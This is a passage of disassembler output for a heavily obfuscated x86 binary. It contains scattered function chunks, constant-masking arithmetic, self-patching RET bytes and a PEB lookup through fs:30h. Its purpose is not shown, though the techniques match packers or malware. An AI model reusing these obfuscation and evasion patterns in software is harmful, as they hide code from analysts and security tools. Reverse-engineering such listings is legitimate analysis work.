; =============== S U B R O U T I N E =======================================
sub_448FB6 proc near ; DATA XREF: sub_44A030+12o
lea eax, nullsub_492
mov byte ptr [eax], 0C3h
call nullsub_502
loc_448FC4: ; CODE XREF: ut7h7i2x:loc_44843Dj
call sub_4471CA
call sub_459C45
sub_448FB6 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4432F5
loc_448FCE: ; CODE XREF: sub_4432F5+Dj
jmp sub_454196
; END OF FUNCTION CHUNK FOR sub_4432F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A0DA
loc_448FD3: ; CODE XREF: sub_43A0DA:loc_43A0ECj
jmp loc_43F417
; END OF FUNCTION CHUNK FOR sub_43A0DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1E5
loc_448FD8: ; CODE XREF: sub_43C1E5+18352j
xor eax, 74B56B58h
and eax, 0E259B892h
or eax, 6E9DA1DCh
cmp eax, 4A2B3AA3h
jmp loc_4444B9
; END OF FUNCTION CHUNK FOR sub_43C1E5
; ---------------------------------------------------------------------------
jbe nullsub_277
jmp sub_439D5C
; ---------------------------------------------------------------------------
mov eax, 0EEE68DF1h
push ecx
push 3DB115E8h
pop ecx
add ecx, 39A95A8Fh
sub ecx, 558F5ADDh
rol ecx, 13h
jmp loc_4470B9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447E29
loc_449020: ; CODE XREF: sub_447E29-3D9Cj
jg sub_441DBB
or ebx, 0C0CA5978h
loc_44902C: ; CODE XREF: sub_447E29:loc_444081j
add eax, 8EAFC7DCh
add eax, ebp
push offset sub_456D7C
jmp loc_4594B2
; END OF FUNCTION CHUNK FOR sub_447E29
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_44903E: ; CODE XREF: sub_44E5AB+6j
js loc_43F977
mov eax, [esp+0Ch+var_C]
push ebx
mov ebx, edx
xchg ebx, [esp+0]
nop
jmp loc_4553D9
; END OF FUNCTION CHUNK FOR sub_44E5AB
; ---------------------------------------------------------------------------
loc_449053: ; CODE XREF: ut7h7i2x:00445593j
sub ebp, esi
not edx
mov eax, esi
; START OF FUNCTION CHUNK FOR sub_43B873
loc_449059: ; CODE XREF: sub_43B873:loc_44557Fj
add eax, 0C70C37B0h
call sub_43AA94
mov ds:off_41D0AC, eax
lea eax, sub_43B873
jmp loc_452417
; END OF FUNCTION CHUNK FOR sub_43B873
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_449075: ; CODE XREF: sub_444EAA+11D18j
and ecx, ebp
loc_449077: ; CODE XREF: sub_444EAA:loc_456BB0j
sub edi, 0AAC886E0h
xor edi, 228B2AAAh
add edi, 0A7509F73h
mov [edi], eax
pop edi
lea eax, loc_4399EA
mov byte ptr [eax], 0C3h
jmp loc_447795
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44941C
loc_44909A: ; CODE XREF: sub_44941C:loc_43CC66j
; sub_44941C-C7A1j
sub eax, 5C54DB04h
add eax, 4FA9F024h
push offset sub_44755A
jmp loc_43FFD7
; END OF FUNCTION CHUNK FOR sub_44941C
; =============== S U B R O U T I N E =======================================
sub_4490B0 proc near ; CODE XREF: sub_43BA59+7p
; ut7h7i2x:00444227j
; FUNCTION CHUNK AT 00440540 SIZE 0000000E BYTES
xchg ecx, [esp+0]
pop ecx
mov ebp, esp
push ecx
call sub_45215F
loc_4490BC: ; CODE XREF: sub_444C53+7j
jmp loc_440540
sub_4490B0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_4490C1: ; CODE XREF: sub_43A513:loc_45769Dj
test byte ptr [ebp-8], 2
loc_4490C5: ; CODE XREF: sub_443A45+D90Ej
jz loc_44BBD2
push ebp
mov eax, [ebp-20h]
jmp loc_443D54
; END OF FUNCTION CHUNK FOR sub_43A513
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_4490D4: ; CODE XREF: sub_446320:loc_447B07j
mov edi, esi
push offset sub_43EB8A
jmp nullsub_237
; END OF FUNCTION CHUNK FOR sub_446320
; =============== S U B R O U T I N E =======================================
sub_4490E0 proc near ; DATA XREF: ut7h7i2x:0043C8FCo
; FUNCTION CHUNK AT 0043AB1C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445378 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004567DB SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004582EA SIZE 00000005 BYTES
jnz loc_445378
mov eax, [esp+0]
push edx
push esi
push 0DED98CCBh
pop esi
xor esi, 8CF0B243h
rol esi, 0Ch
jmp loc_4582EA
sub_4490E0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_4490FF: ; CODE XREF: sub_43F1B2-51F6j
pop eax
or edx, 2280219Dh
and edx, 678A51D7h
test edx, 100000h
jmp loc_43B894
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
loc_449117: ; CODE XREF: ut7h7i2x:0043BCA3j
jb loc_44897F
popf
xor eax, esi
test edi, 317129A6h
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_449126: ; CODE XREF: sub_43AB62:loc_43EBBAj
jmp loc_44EF1D
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FDF2
loc_44912B: ; CODE XREF: sub_44FDF2-9AF0j
jz loc_447F1A
jbe loc_444881
loc_449137: ; CODE XREF: sub_44FDF2:loc_447EA4j
mov eax, [ebp-0Ch]
cmp eax, ds:dword_4487C4
jz loc_44DB32
jmp loc_4395CE
; END OF FUNCTION CHUNK FOR sub_44FDF2
; ---------------------------------------------------------------------------
loc_44914B: ; CODE XREF: ut7h7i2x:00447BD0j
mov eax, [esp]
push edx
call sub_44E835
mov eax, 3C248B30h
call sub_44EA6A
; START OF FUNCTION CHUNK FOR sub_4448AF
loc_44915E: ; CODE XREF: sub_4448AF+11150j
jmp nullsub_233
; END OF FUNCTION CHUNK FOR sub_4448AF
; ---------------------------------------------------------------------------
jge loc_448BDF
jmp sub_453188
; ---------------------------------------------------------------------------
loc_44916E: ; CODE XREF: ut7h7i2x:00451167j
xchg ecx, ebx
test eax, 2484BA53h
jmp loc_4465C1
; =============== S U B R O U T I N E =======================================
sub_44917B proc near ; CODE XREF: ut7h7i2x:00450C95j
; sub_439701:loc_451585p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_10 = dword ptr 14h
; FUNCTION CHUNK AT 004395BD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043D6AE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E4E5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E961 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043EBCA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044062B SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00440984 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442EC2 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004434E8 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00446A47 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044733E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448B14 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A5B7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044AE4A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044BE6E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044CC13 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DFB2 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044EAFC SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00451B54 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452C7D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454985 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00456305 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456E20 SIZE 0000000D BYTES
xchg edi, [esp-4+arg_0]
pop edi
cmp eax, [ebp-18h]
loc_449182: ; CODE XREF: sub_43D021:loc_44D1C9j
jb loc_44A5B7
jmp loc_43EBCA
sub_44917B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_44918D: ; CODE XREF: ut7h7i2x:loc_44B978j
retn
; ---------------------------------------------------------------------------
popf
jmp sub_4552AC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_547. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_449195: ; CODE XREF: sub_43B7F7:loc_43E504j
rol edx, 1Ah
and edx, 6FB3B689h
xor edx, 9B2F9DEEh
add edx, ebp
add edx, 6451460Dh
mov edx, [edx]
imul byte ptr [edx]
jmp loc_4492AC
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_4491B5: ; CODE XREF: sub_447EB5+10267j
jg loc_4498A6
jl loc_4454AB
loc_4491C1: ; CODE XREF: sub_447EB5:loc_458110j
or ebx, 2370BFC0h
xor ebx, 1419AD15h
add eax, ebx
pop ebx
mov eax, [eax]
neg eax
jmp loc_44DCF7
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440F8E
loc_4491D9: ; CODE XREF: sub_440F8E+16j
; sub_447CBE-466Ej ...
dec eax
call sub_4424E8
jmp loc_449627
; END OF FUNCTION CHUNK FOR sub_440F8E
; ---------------------------------------------------------------------------
loc_4491E4: ; CODE XREF: ut7h7i2x:00452CD0j
push ebx
mov ebx, edi
xchg ebx, [esp]
loc_4491EA: ; CODE XREF: ut7h7i2x:00450B9Fj
push 69C07ACBh
xchg ebx, [esp]
mov edi, ebx
pop ebx
rol edi, 0Bh
jmp loc_43D3DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_4491FD: ; CODE XREF: sub_457A66-153B0j
jz loc_44605F
jmp loc_447D26
; END OF FUNCTION CHUNK FOR sub_457A66
; =============== S U B R O U T I N E =======================================
sub_449208 proc near ; DATA XREF: sub_44F300+754Do
pop ecx
pop ecx
pop ebp
retn
sub_449208 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450651
loc_44920C: ; CODE XREF: sub_44F300-2F0Ej
; sub_450651+60B6j ...
push offset sub_44E252
jmp loc_43C438
; END OF FUNCTION CHUNK FOR sub_450651
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_449216 proc near ; CODE XREF: sub_4392AE:loc_43B7D8j
retn
sub_449216 endp
; =============== S U B R O U T I N E =======================================
sub_449217 proc near ; CODE XREF: sub_43F094+10p
; FUNCTION CHUNK AT 0043A200 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004454E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004461C7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044773F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004477BD SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044A984 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004567BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458A6C SIZE 00000005 BYTES
push ebx
push ecx
mov eax, large fs:30h
mov eax, [eax+0Ch]
mov eax, [eax+0Ch]
loc_449226: ; CODE XREF: sub_4481A2+4004j
; sub_4481A2+9CA6j
jnz loc_4477BD
jmp loc_4567BF
sub_449217 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_449231 proc near ; DATA XREF: sub_44E84C:loc_45504Eo
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004461A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449372 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A0AC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044DB85 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00455F9D SIZE 0000000A BYTES
push esi
push eax
pop esi
xchg esi, [esp+4+var_4]
jmp loc_44A0AC
sub_449231 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44577E
loc_44923C: ; CODE XREF: sub_44577E:loc_4408A1j
call edx
xchg ebx, [esp-4+arg_0]
mov ebp, ebx
pop ebx
xor eax, eax
mov [ebp-4], eax
mov eax, [ebp-4]
jmp loc_443352
; END OF FUNCTION CHUNK FOR sub_44577E
; ---------------------------------------------------------------------------
xchg eax, edx
jmp sub_4390BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_449258: ; CODE XREF: sub_4529E0-EA5Aj
jz loc_456068
test ecx, ebp
jmp loc_458B20
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
loc_449265: ; CODE XREF: ut7h7i2x:0043AD00j
mov byte ptr [ecx], 50h
pop ecx
call sub_445FEA
; START OF FUNCTION CHUNK FOR sub_4398BF
loc_44926E: ; CODE XREF: sub_4398BF:loc_44E830j
push 2D0A0508h
pop edi
sub edi, 2352DDF4h
or edi, 0A5AB9196h
add edi, 5EFE9D46h
add eax, edi
jmp loc_43B229
; END OF FUNCTION CHUNK FOR sub_4398BF
; =============== S U B R O U T I N E =======================================
sub_44928D proc near ; DATA XREF: sub_43A556:loc_456EB1o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B4C6 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00442DA9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004459D5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044CD6C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044E388 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00450A70 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455D9A SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045A758 SIZE 00000018 BYTES
jnz loc_43B4C6
loc_449293: ; CODE XREF: ut7h7i2x:00444EF0j
push 0
push ecx
push 6AC5CE8Eh
pop ecx
jmp loc_44CD6C
sub_44928D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4492A1 proc near ; DATA XREF: sub_43CD4E+7o
; FUNCTION CHUNK AT 00444619 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A453 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451190 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004524A6 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00458128 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045A644 SIZE 00000005 BYTES
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_45A644
sub_4492A1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_4492AC: ; CODE XREF: sub_43B7F7+D9B9j
cmp al, 0A4h
jz loc_43E3B7
jmp loc_457019
; END OF FUNCTION CHUNK FOR sub_43B7F7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_453. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4570FD
loc_4492BA: ; CODE XREF: sub_4570FD+16j
jnz loc_44B0E4
jmp loc_448CB2
; END OF FUNCTION CHUNK FOR sub_4570FD
; ---------------------------------------------------------------------------
test al, al
jz loc_44FD0F
jmp loc_448B9E
; ---------------------------------------------------------------------------
loc_4492D2: ; CODE XREF: ut7h7i2x:004461B1j
jp loc_439EF2
and esi, edx
jmp loc_44F5E9
; ---------------------------------------------------------------------------
loc_4492DF: ; CODE XREF: ut7h7i2x:0044FE24j
jnz loc_43E864
jmp loc_441BEF
; ---------------------------------------------------------------------------
loc_4492EA: ; CODE XREF: ut7h7i2x:0043DE76j
jg loc_452FDE
pushf
jmp loc_44E927
; ---------------------------------------------------------------------------
sbb edi, 0E1AA060Bh
jmp loc_457948
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4476D0
loc_449301: ; CODE XREF: sub_4476D0+19j
cmp edx, 0F4C9E2C4h
jmp loc_44AA39
; END OF FUNCTION CHUNK FOR sub_4476D0
; ---------------------------------------------------------------------------
test eax, 0C492AFCBh
jmp loc_44E6A2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458937
loc_449317: ; CODE XREF: sub_458937+7j
xchg eax, [esp+0]
push 5794BB4Eh
pop ecx
add ecx, 35D2CAABh
or ecx, 211FB5C2h
rol ecx, 1Ch
and ecx, ds:4000FBh
jmp loc_459DC8
; END OF FUNCTION CHUNK FOR sub_458937
; ---------------------------------------------------------------------------
loc_44933A: ; CODE XREF: ut7h7i2x:0043F12Cj
pushf
; =============== S U B R O U T I N E =======================================
sub_44933B proc near ; CODE XREF: sub_43BB85+1E3FEp
xchg esi, [esp+0]
pop esi
call sub_454196
retn
sub_44933B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_449345: ; CODE XREF: sub_447CBE-634Bj
jmp loc_4452D7
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BE93
loc_44934A: ; CODE XREF: sub_43BE93+12E05j
sub ebp, 5FA0A718h
loc_449350: ; CODE XREF: sub_43BE93:loc_443F8Bj
push offset sub_44D9A0
jmp loc_453830
; END OF FUNCTION CHUNK FOR sub_43BE93
; ---------------------------------------------------------------------------
loc_44935A: ; CODE XREF: ut7h7i2x:004453E6j
xchg ecx, [eax]
; START OF FUNCTION CHUNK FOR sub_43D021
loc_44935C: ; CODE XREF: sub_43D021+83B9j
xor edx, 5FC59429h
add edx, 3D32FB46h
call sub_4521DB
loc_44936D: ; CODE XREF: sub_43B7F7+1B828j
jmp loc_457B44
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449231
loc_449372: ; CODE XREF: sub_449231+E8Dj
jmp loc_44DB85
; END OF FUNCTION CHUNK FOR sub_449231
; ---------------------------------------------------------------------------
add esp, 10h
pop ebp
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_44937E proc near ; CODE XREF: sub_444851:loc_441DDAj
; ut7h7i2x:004446D3p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439590 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043AF6A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043B65E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043D982 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00441D28 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004435D9 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044397C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448868 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449B67 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044AAFB SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044D309 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FBB8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00452CE0 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045422D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00454D66 SIZE 0000000E BYTES
jnb sub_450DB3
push ebp
mov ebp, esp
push ecx
jmp loc_448868
sub_44937E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xor ebx, 808B91BCh
add eax, ecx
jmp sub_456E7D
; =============== S U B R O U T I N E =======================================
sub_44939A proc near ; CODE XREF: ut7h7i2x:004404A1j
; sub_43CD08:loc_44554Bp
; FUNCTION CHUNK AT 0045063B SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov ds:off_41D07C, eax
lea eax, sub_43CD08
mov byte ptr [eax], 0C3h
jmp loc_45063B
sub_44939A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push esi
mov esi, eax
jmp loc_447582
; ---------------------------------------------------------------------------
loc_4493BA: ; CODE XREF: ut7h7i2x:00441192j
jnz loc_447C3F
sbb ebx, 0CEDEDA39h
jmp sub_43B34F
; ---------------------------------------------------------------------------
loc_4493CB: ; CODE XREF: ut7h7i2x:loc_439293j
call sub_43A240
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_4493D0: ; CODE XREF: sub_445AD1+1Aj
jmp loc_450F34
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_4493D5: ; CODE XREF: sub_452B14-10006j
jmp nullsub_281
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4406F1
loc_4493DA: ; CODE XREF: sub_4406F1:loc_454165j
pop edx
lea eax, nullsub_12
push offset loc_43A54E
jmp nullsub_271
; END OF FUNCTION CHUNK FOR sub_4406F1
; ---------------------------------------------------------------------------
loc_4493EB: ; CODE XREF: ut7h7i2x:00452324j
cmp edi, 0D12C5A71h
jmp loc_43AA66
; ---------------------------------------------------------------------------
loc_4493F6: ; CODE XREF: ut7h7i2x:loc_457508j
retn
; ---------------------------------------------------------------------------
loc_4493F7: ; CODE XREF: ut7h7i2x:004390CEj
jmp locret_44BBC8
; ---------------------------------------------------------------------------
loc_4493FC: ; CODE XREF: ut7h7i2x:00441AF9j
mov esi, 395C961Ch
jmp loc_43F21F
; =============== S U B R O U T I N E =======================================
sub_449406 proc near ; CODE XREF: ut7h7i2x:loc_444B05p
; ut7h7i2x:00453499j
; FUNCTION CHUNK AT 004471B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004485C4 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044B5E6 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004548F3 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
push edx
push 90ECE9DFh
pop edx
sub edx, 9E2387A0h
jmp loc_4548F3
sub_449406 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44941C proc near ; CODE XREF: sub_452950-1457Cp
; ut7h7i2x:0044B150j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439507 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B160 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0043BF35 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043CC66 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043CE07 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FFD7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044909A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004510DE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045830E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458C37 SIZE 0000001F BYTES
xchg ebx, [esp+0]
pop ebx
loc_449420: ; CODE XREF: ut7h7i2x:loc_45550Cj
mov esp, ebp
xchg ebx, [esp+0]
mov ebp, ebx
jmp loc_43BF35
sub_44941C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44942C: ; CODE XREF: ut7h7i2x:004588F7j
add eax, ebx
jmp loc_451AFC
; ---------------------------------------------------------------------------
loc_449433: ; DATA XREF: sub_442C48:loc_43C049o
add esi, 7548CCC1h
mov [esi], eax
pop esi
lea eax, nullsub_62
jmp loc_43D47A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_449447: ; CODE XREF: sub_44602A:loc_44B393j
push offset loc_43A5E4
jmp loc_458450
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446258
loc_449451: ; CODE XREF: sub_446258-70F9j
jnb loc_440F1E
mov ebp, 65D83F5Ch
jmp loc_45373A
; END OF FUNCTION CHUNK FOR sub_446258
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_449461: ; CODE XREF: sub_44865D:loc_4391DBj
; sub_44865D+12774j
push eax
push 9D46BCA4h
pop eax
or eax, 887266DBh
add eax, 62890101h
xchg eax, [esp+0]
push edi
jmp loc_43D39B
; END OF FUNCTION CHUNK FOR sub_44865D
; =============== S U B R O U T I N E =======================================
sub_44947D proc near ; CODE XREF: ut7h7i2x:0043CDA3j
; sub_44F300:loc_45110Cp
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043C09E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00446E64 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044C85D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450815 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455BC1 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459992 SIZE 00000010 BYTES
xchg edi, [esp+0]
pop edi
push edi
push 648123A4h
xchg ebx, [esp+0]
mov edi, ebx
jmp loc_450815
sub_44947D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F56
loc_449491: ; CODE XREF: sub_446F56:loc_44358Aj
jz loc_459F45
jmp loc_44DE82
; END OF FUNCTION CHUNK FOR sub_446F56
; =============== S U B R O U T I N E =======================================
sub_44949C proc near ; DATA XREF: sub_445056+4CB1o
; FUNCTION CHUNK AT 00440C97 SIZE 00000011 BYTES
push 0B29273B3h
pop edx
and edx, 51C834D4h
jnz loc_440C97
loc_4494AE: ; CODE XREF: ut7h7i2x:004547FDj
jmp nullsub_452
sub_44949C endp
; ---------------------------------------------------------------------------
ror edi, 16h
shl esi, 19h
sbb eax, edx
jmp loc_43A69B
; =============== S U B R O U T I N E =======================================
sub_4494C0 proc near ; CODE XREF: ut7h7i2x:0043ADBBj
; sub_45195C+6p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043C163 SIZE 00000009 BYTES
xchg ecx, [esp-4+arg_0]
pop ecx
push 5985112h
pop edx
sub edx, 0BC65EC03h
add edx, 0C2894E8Bh
rol edx, 1
loc_4494D8: ; CODE XREF: sub_453E14:loc_450885j
add edx, 0E8CDF09Ch
jmp loc_43C163
sub_4494C0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449B8E
loc_4494E3: ; CODE XREF: sub_449B8E+998Aj
jb loc_4426E0
loc_4494E9: ; CODE XREF: sub_449B8E:loc_4413B3j
push edi
push 0E4016ADBh
pop edi
jmp loc_445868
; END OF FUNCTION CHUNK FOR sub_449B8E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_4494F5: ; CODE XREF: sub_44F495:loc_445AAFj
xor eax, 0BAF9380Dh
add eax, ebp
add eax, 5DADA722h
mov eax, [eax]
push eax
jmp loc_44FE6C
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
jl nullsub_509
jmp sub_447185
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_449516: ; CODE XREF: sub_4503C3:loc_457095j
sub ebp, 1167686Bh
adc ebx, 0DA35AB7Fh
pop ebx
and edi, ebx
jmp loc_447BE0
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4551D3
loc_44952A: ; CODE XREF: sub_4551D3-4AC5j
push edx
push 34ABB843h
pop edx
sub edx, 4F78B330h
add edx, 1B11A35Dh
jmp loc_43BDA8
; END OF FUNCTION CHUNK FOR sub_4551D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D5BE
loc_449542: ; CODE XREF: sub_44D5BE:loc_4573FDj
and edx, 3B6DBB2Bh
test edx, 200000h
jmp loc_440A61
; END OF FUNCTION CHUNK FOR sub_44D5BE
; =============== S U B R O U T I N E =======================================
sub_449553 proc near ; CODE XREF: sub_4497C1:loc_447696p
; ut7h7i2x:0044E9A8j
; FUNCTION CHUNK AT 0043AF5E SIZE 00000007 BYTES
xchg edx, [esp+0]
pop edx
add edx, 0B6F4F41h
mov [edx], eax
jmp loc_43AF5E
sub_449553 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4474B1
loc_449564: ; CODE XREF: sub_4474B1:loc_455E7Aj
push edx
push eax
jmp loc_440235
; ---------------------------------------------------------------------------
loc_44956B: ; CODE XREF: sub_4474B1+4j
add esp, 8
mov eax, [eax]
add eax, [ebp-4]
call sub_439B17
cmp eax, [ebp-8]
jnz loc_4408B0
jmp loc_43FB1B
; END OF FUNCTION CHUNK FOR sub_4474B1
; ---------------------------------------------------------------------------
push 259737D5h
pop eax
xor eax, 3EE338A4h
and eax, 0BF706CEDh
add eax, 0CAF0ED0Eh
; START OF FUNCTION CHUNK FOR sub_44E6B4
loc_44959E: ; CODE XREF: sub_44E6B4:loc_446913j
jmp loc_451233
; END OF FUNCTION CHUNK FOR sub_44E6B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AA54
loc_4495A3: ; CODE XREF: sub_44AA54:loc_44E4CBj
jnz loc_446555
jmp loc_449E36
; END OF FUNCTION CHUNK FOR sub_44AA54
; ---------------------------------------------------------------------------
loc_4495AE: ; CODE XREF: ut7h7i2x:0043A4F4j
jl loc_44C180
